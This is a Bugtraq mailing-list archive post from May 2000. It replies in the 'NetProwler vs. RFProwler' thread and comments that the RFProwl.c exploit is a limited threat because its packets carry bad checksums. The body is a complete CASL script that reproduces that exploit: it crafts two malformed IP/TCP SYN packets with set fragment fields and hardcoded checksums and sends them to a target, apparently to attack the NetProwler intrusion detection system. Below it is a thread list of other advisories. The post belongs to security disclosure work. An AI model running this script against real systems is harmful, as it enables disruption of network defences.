Bugtraq mailing list archives
Re: RFP2K05: NetProwler vs. RFProwler
From: quinta () CERTBR COM BR (Pedro Quintanilha)
Date: Tue, 23 May 2000 20:38:47 -0300
A little more about... There is a CASL Script that reproduces the RFProwl.c exploit. This exploit sends two packets with wrong IP checksum, so I think that it´s not a serious threat like remote attacks from Internet, since the most routers and firewalls will drop that packets. []´s Pedro Quintanilha quinta () certbr com br ================================================= #include "tcpip.casl" #include "packets.casl" Src = pop args; Dst = pop args; Src = getip(Src); Dst = getip(Dst); iph = copy TCPIP; iph.ip_version = 4; iph.ip_headerlen = 5; iph.ip_tos = 0; iph.ip_length = 36; iph.ip_id = 2233; iph.ip_offset = 3; iph.ip_ttl = 62; iph.ip_protocol = 6; iph.ip_cksum = 38648; iph.ip_source = Src; iph.ip_destination = Dst; tch = copy SYN; tch.tcp_source = 1026; tch.tcp_destination = 2058; tch.tcp_seqno = 2542901; tch.tcp_ackno = 0; tch.tcp_offset = 0; tch.tcp_x2 = 1; tch.tcp_syn = 1; tch.tcp_window = 768; pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0"; packet = [ iph, tch, pk1data ]; ip_output(packet); iph2 = copy TCPIP; iph2.ip_version = 4; iph2.ip_headerlen = 5; iph2.ip_tos = 0; iph2.ip_length = 44; iph2.ip_id = 2239; iph2.ip_mf = 1; iph2.ip_ttl = 62; iph2.ip_protocol = 6; iph2.ip_cksum = 30445; iph2.ip_source = Src; iph2.ip_destination = Dst; tch2 = copy SYN; tch2.tcp_source = 1032; tch2.tcp_destination = 21; tch2.tcp_seqno = 2816737352; tch2.tcp_ackno = 0; tch2.tcp_x2 = 10; tch2.tcp_syn = 1; tch2.tcp_window = 32120; tch2.tcp_cksum = 29341; pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0"; packet = [ iph2, tch2, pk2data ]; ip_output(packet); =================================================
Current thread:
- Re: RFP2K04: Mining BlackICE with RFPickAxe, (continued)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Robert Graham (May 17)
- antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Sebastian (May 18)
- Re: antisniff latest ("two times fixed") version still exploitable, l0phtl0phe-kid.c Mudge (May 18)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Matt (May 18)
- AUX Security Advisory on Be/OS 5.0 (DoS) visi0n (May 17)
- Re: RFP2K04: Mining BlackICE with RFPickAxe Andrew Lambeth (May 19)
- Remote Dos attack against Intel express 8100 router Dimuthu Parussalla (May 18)
- RFP2K05: NetProwler vs. RFProwler rain forest puppy (May 19)
- Key Generation Security Flaw in PGP 5.0 gec () ACM ORG (May 23)
- Filesystem vulnerability in AIX salme () US IBM COM (May 23)
- Re: RFP2K05: NetProwler vs. RFProwler Pedro Quintanilha (May 23)
- Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2) Qpopper Support (May 23)
- Remote xploit for MDBMS |[TDP]| (May 24)
- HP Web JetAdmin Version 6.0 Remote DoS attack Vulnerability Ussr Labs (May 24)
- Re: RFP2K04: Mining BlackICE with RFPickAxe rain forest puppy (May 19)
- revised patches for kerberos vulnerability Tom Yu (May 19)
- Microsoft Security Bulletin (MS00-029) Microsoft Product Security (May 19)
- BindView Security Advisory: jolt2 - Remote DoS against NT, W2K, 9x BindView Security Advisory (May 19)
- Bugtraq Stats for the last 3 years available now. Alfred Huger (May 17)